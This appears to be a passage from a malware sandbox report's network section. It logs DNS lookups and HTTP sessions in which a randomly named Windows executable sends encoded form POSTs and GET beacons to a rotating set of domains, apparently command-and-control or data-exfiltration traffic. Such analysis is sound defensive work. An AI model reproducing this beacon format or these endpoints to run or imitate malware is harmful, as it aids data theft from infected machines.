Oct 8, 2024 15:53:20.436914921 CEST | 1.1.1.1 | 192.168.2.6 | 0xfc4f | No error (0) | www.elsupertodo.net | | 148.72.152.174 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:53:36.074657917 CEST | 1.1.1.1 | 192.168.2.6 | 0x80a6 | No error (0) | www.omexai.info | omexai.info | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:53:36.074657917 CEST | 1.1.1.1 | 192.168.2.6 | 0x80a6 | No error (0) | omexai.info | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:53:36.074657917 CEST | 1.1.1.1 | 192.168.2.6 | 0x80a6 | No error (0) | omexai.info | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:53:50.640687943 CEST | 1.1.1.1 | 192.168.2.6 | 0x8a53 | No error (0) | www.tekilla.wtf | redirect.3dns.box | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:53:50.640687943 CEST | 1.1.1.1 | 192.168.2.6 | 0x8a53 | No error (0) | redirect.3dns.box | | 172.191.244.62 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:54:04.274966955 CEST | 1.1.1.1 | 192.168.2.6 | 0x9c3d | No error (0) | www.bola88site.one | bola88site.one | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:54:04.274966955 CEST | 1.1.1.1 | 192.168.2.6 | 0x9c3d | No error (0) | bola88site.one | | 172.96.191.39 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:54:17.958338976 CEST | 1.1.1.1 | 192.168.2.6 | 0xb283 | No error (0) | www.languagemodel.pro | webredir.vip.gandi.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:54:17.958338976 CEST | 1.1.1.1 | 192.168.2.6 | 0xb283 | No error (0) | webredir.vip.gandi.net | | 217.70.184.50 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:54:31.444658995 CEST | 1.1.1.1 | 192.168.2.6 | 0x8254 | No error (0) | www.kexweb.top | | 63.250.47.40 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:54:44.822880030 CEST | 1.1.1.1 | 192.168.2.6 | 0x51fc | No error (0) | www.jobworklanka.online | jobworklanka.online | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:54:44.822880030 CEST | 1.1.1.1 | 192.168.2.6 | 0x51fc | No error (0) | jobworklanka.online | | 91.184.0.200 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:54:58.351511002 CEST | 1.1.1.1 | 192.168.2.6 | 0xaf3a | No error (0) | www.dyme.tech | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:54:58.351511002 CEST | 1.1.1.1 | 192.168.2.6 | 0xaf3a | No error (0) | www.dyme.tech | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:11.691231012 CEST | 1.1.1.1 | 192.168.2.6 | 0xff10 | No error (0) | www.arlon-commerce.com | whois-unverified.domainbox.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:55:25.958050013 CEST | 1.1.1.1 | 192.168.2.6 | 0x5c7c | No error (0) | www.mizuquan.top | | 43.242.202.169 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:39.943692923 CEST | 1.1.1.1 | 192.168.2.6 | 0xe706 | No error (0) | www.nobartv6.website | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:54.771203041 CEST | 1.1.1.1 | 192.168.2.6 | 0x4af6 | No error (0) | www.sailnway.net | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:55:54.771203041 CEST | 1.1.1.1 | 192.168.2.6 | 0x4af6 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 15:55:54.771203041 CEST | 1.1.1.1 | 192.168.2.6 | 0x4af6 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49932 | 148.72.152.174 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:53:20.457938910 CEST | 568 | OUT | GET /2jit/?5xn03=7vMx2HlPWl&I4ET5=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1SoEkaj2DIJpzLN/p7keITu3kRidpknmkeFNiZOa1jl486ZzlEj4= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.elsupertodo.net
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Oct 8, 2024 15:53:20.977030039 CEST | 551 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 08 Oct 2024 13:53:20 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.elsupertodo.net/2jit/?5xn03=7vMx2HlPWl&I4ET5=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1SoEkaj2DIJpzLN/p7keITu3kRidpknmkeFNiZOa1jl486ZzlEj4=
X-XSS-Protection: 1; mode=block
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49985 | 3.33.130.190 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:53:36.095050097 CEST | 814 | OUT | POST /7xi5/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.omexai.info
Origin: http://www.omexai.info
Content-Type: application/x-www-form-urlencoded
Content-Length: 210
Connection: close
Cache-Control: max-age=0
Referer: http://www.omexai.info/7xi5/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Ascii: I4ET5=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5yjba/r/QvDkGwMpnkx6olWmEr0HATyE0Tn6yLlf4mn3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49986 | 3.33.130.190 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:53:38.635107994 CEST | 838 | OUT | POST /7xi5/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.omexai.info
Origin: http://www.omexai.info
Content-Type: application/x-www-form-urlencoded
Content-Length: 234
Connection: close
Cache-Control: max-age=0
Referer: http://www.omexai.info/7xi5/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Ascii: I4ET5=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7QjtHwJ76ucplay7J3xGUwJCsBfLxCt+m+//S6JyCYUaDzvNXTHx+F2CtboS8S03ecp74rqkapMiVwRvcmsOmroWGUZKle+GGUry7yc5eZ+HIanb1d4fqx1W+QfeUPr8Rv7BKmNz7XxZ612kEps1Azyu2Tf6gcp43SCUh1NtYGZ3P+aaO60/oAGd5Q==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49987 | 3.33.130.190 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:53:41.231118917 CEST | 1851 | OUT | POST /7xi5/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.omexai.info
Origin: http://www.omexai.info
Content-Type: application/x-www-form-urlencoded
Content-Length: 1246
Connection: close
Cache-Control: max-age=0
Referer: http://www.omexai.info/7xi5/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49988 | 3.33.130.190 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:53:43.798047066 CEST | 564 | OUT | GET /7xi5/?I4ET5=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAz/7PAbspGHYrJhwiAgKAJ54r5fuZ48YeCJJLAh0jfNMUyJhiqw=&5xn03=7vMx2HlPWl HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.omexai.info
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Oct 8, 2024 15:53:45.163804054 CEST | 414 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Tue, 08 Oct 2024 13:53:45 GMT
Content-Type: text/html
Content-Length: 274
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?I4ET5=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAz/7PAbspGHYrJhwiAgKAJ54r5fuZ48YeCJJLAh0jfNMUyJhiqw=&5xn03=7vMx2HlPWl"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49990 | 172.191.244.62 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:53:50.659717083 CEST | 814 | OUT | POST /fpzw/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.tekilla.wtf
Origin: http://www.tekilla.wtf
Content-Type: application/x-www-form-urlencoded
Content-Length: 210
Connection: close
Cache-Control: max-age=0
Referer: http://www.tekilla.wtf/fpzw/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Ascii: I4ET5=imRwTcaaL03jmZYpYbwrVqujR0ZfU5u1ez6c2nZUxRqXNvdj6iahL8WC1AV8V61OXGgT455n8VVCToCY263D3ZDYFawD1KpId6yBs5YzJdfV1fsAU07hruouIZh1E3emVaCIofSrdXgPeKdRfvylNA+GTVozUTjAaRlyeFm9w96vlnQslA3dNGNC798lqk5pUvnL36LZ2e/Q
Oct 8, 2024 15:53:51.143800974 CEST | 195 | IN | HTTP/1.1 404 Not Found
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Tue, 08 Oct 2024 13:53:51 GMT
Content-Length: 19
Connection: close
Data Ascii: 404 page not found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49992 | 172.191.244.62 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:53:53.198024035 CEST | 838 | OUT | POST /fpzw/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.tekilla.wtf
Origin: http://www.tekilla.wtf
Content-Type: application/x-www-form-urlencoded
Content-Length: 234
Connection: close
Cache-Control: max-age=0
Referer: http://www.tekilla.wtf/fpzw/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Ascii: I4ET5=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExieXNLZj7jahFcWC7gU3ba1HXGsb45Vn8VpCTpSY2JfCxJDGN6wB4qpId6yBs5NWJc3V0ucAGAXujOotYph1VneiVaC+odmSdVoPeLtRReymaw+6OlpESjS7RTk3XkKZhe6ktxR25z3+fWtA7/kXqE5DWvfLltH+5qazSQfmspeR2gtbQiYE6ZrPSw==
Oct 8, 2024 15:53:53.660002947 CEST | 195 | IN | HTTP/1.1 404 Not Found
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Tue, 08 Oct 2024 13:53:53 GMT
Content-Length: 19
Connection: close
Data Ascii: 404 page not found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49993 | 172.191.244.62 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:53:55.749417067 CEST | 1851 | OUT | POST /fpzw/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.tekilla.wtf
Origin: http://www.tekilla.wtf
Content-Type: application/x-www-form-urlencoded
Content-Length: 1246
Connection: close
Cache-Control: max-age=0
Referer: http://www.tekilla.wtf/fpzw/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Ascii: I4ET5= [TRUNCATED]
Oct 8, 2024 15:53:56.364268064 CEST | 195 | IN | HTTP/1.1 404 Not Found
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Tue, 08 Oct 2024 13:53:56 GMT
Content-Length: 19
Connection: close
Data Ascii: 404 page not found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49994 | 172.191.244.62 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:53:58.429929018 CEST | 564 | OUT | GET /fpzw/?I4ET5=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx4v2Cu8U6PY7doS41bFIW7T/4/1mYTXkrfUCe/4cLGyNDvWcha0=&5xn03=7vMx2HlPWl HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.tekilla.wtf
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Oct 8, 2024 15:53:58.877970934 CEST | 195 | IN | HTTP/1.1 404 Not Found
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Tue, 08 Oct 2024 13:53:58 GMT
Content-Length: 19
Connection: close
Data Ascii: 404 page not found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49995 | 172.96.191.39 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:54:04.354361057 CEST | 823 | OUT | POST /3qit/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.bola88site.one
Origin: http://www.bola88site.one
Content-Type: application/x-www-form-urlencoded
Content-Length: 210
Connection: close
Cache-Control: max-age=0
Referer: http://www.bola88site.one/3qit/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Ascii: I4ET5=g1Eybgs1boaXhYTsWTf67vAc+5urKBucsA6B1Ji0B8yO0mazEq3TkflxPpQwXROmQAX789RH6y048jeLsU80ICtp25d+BsbEDjeDBZh1I1iazyn6tXoLqItzMWdRe1iRtjppJI/zXJ59/X1/4/wWFfQeXTZc7nGeUb0veUs27uF+6UOnWjltshTKb4p55qfEBCMphehz4RUL
Oct 8, 2024 15:54:05.214426994 CEST | 1033 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 796
date: Tue, 08 Oct 2024 13:54:05 GMT
server: LiteSpeed
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49996 | 172.96.191.39 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:54:06.899178028 CEST | 847 | OUT | POST /3qit/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.bola88site.one
Origin: http://www.bola88site.one
Content-Type: application/x-www-form-urlencoded
Content-Length: 234
Connection: close
Cache-Control: max-age=0
Referer: http://www.bola88site.one/3qit/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Ascii: I4ET5=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOmO0GqzFr3TlflxHJQ1dxPkQArN8/1H62k48iuLvl83aitrw5dwOMbEDjeDBZdfI16azDX6t2oKpIt0PWdRMFiVtjpAJJzZXLx9/WF/2OwXQvQYZzYOylHweYlTAksijch9yCP9KQlO+xzIb6xL5KfuDC0pzJtU3lxohCFX6ybGsJHqRTMsh+E1tw==
Oct 8, 2024 15:54:07.888030052 CEST | 1033 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 796
date: Tue, 08 Oct 2024 13:54:07 GMT
server: LiteSpeed
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49997 | 172.96.191.39 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:54:09.448296070 CEST | 1860 | OUT | POST /3qit/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.bola88site.one
Origin: http://www.bola88site.one
Content-Type: application/x-www-form-urlencoded
Content-Length: 1246
Connection: close
Cache-Control: max-age=0
Referer: http://www.bola88site.one/3qit/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 65 4f 33 33 4b 7a 46 49 66 54 69 66 6c 78 59 35 51 30 64 78 50 6c 51 41 43 45 38 2f 35 58 36 30 73 34 36 42 6d 4c 71 52 67 33 51 69 74 72 38 5a 64 78 42 73 62 52 44 6c 2b 48 42 64 39 66 49 31 36 61 7a 41 66 36 36 33 6f 4b 76 49 74 7a 4d 57 64 56 65 31 69 39 74 69 4e 78 4a 4a 32 73 58 36 52 39 34 32 56 2f 30 38 59 58 53 50 51 61 55 54 5a 4c 79 6c 4c 7a 65 59 34 71 41 6e 77 45 6a 66 39 39 78 6b 36 4c 50 6a 35 44 6a 42 54 43 4b 34 46 5a 6e 4f 58 61 4c 51 77 70 77 4c 31 68 78 6e 46 37 6d 48 78 31 79 42 61 58 6b 36 62 4c 61 57 52 4a 6b 50 74 64 77 7a 62 2f 77 6f 65 78 51 77 61 65 6d 76 79 65 56 73 43 39 37 79 43 30 52 6a 38 77 49 79 76 33 35 4d 31 70 50 5a 44 71 73 4c 38 5a 37 4f 69 2b 57 51 36 74 4c 56 79 74 75 76 75 5a 77 33 74 51 62 2b 49 63 39 4c 61 5a 4c 4b 6f 6a 65 51 41 43 62 32 36 5a 42 58 39 6b 37 6e 69 45 6a 6e 4a 4f 64 59 59 69 6d 4b 77 59 58 70 46 77 [TRUNCATED]
Data Ascii: I4ET5=[TRUNCATED]
Oct 8, 2024 15:54:10.367219925 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                              Connection: close
                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                              pragma: no-cache
                                                                                              content-type: text/html
                                                                                              content-length: 796
                                                                                              date: Tue, 08 Oct 2024 13:54:10 GMT
                                                                                              server: LiteSpeed
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49998 | 172.96.191.39 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:54:11.991736889 CEST | 567 | OUT | GET /3qit/?I4ET5=t3sSYQcRGIG2xp6lfBDs7+5agoifCQSrmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYQz0a67JVPuK3DRmcV/dEWB275yuHlkBzmr1SLVBbDDm50CRvDPY=&5xn03=7vMx2HlPWl HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.bola88site.one
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Oct 8, 2024 15:54:12.891012907 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                              Connection: close
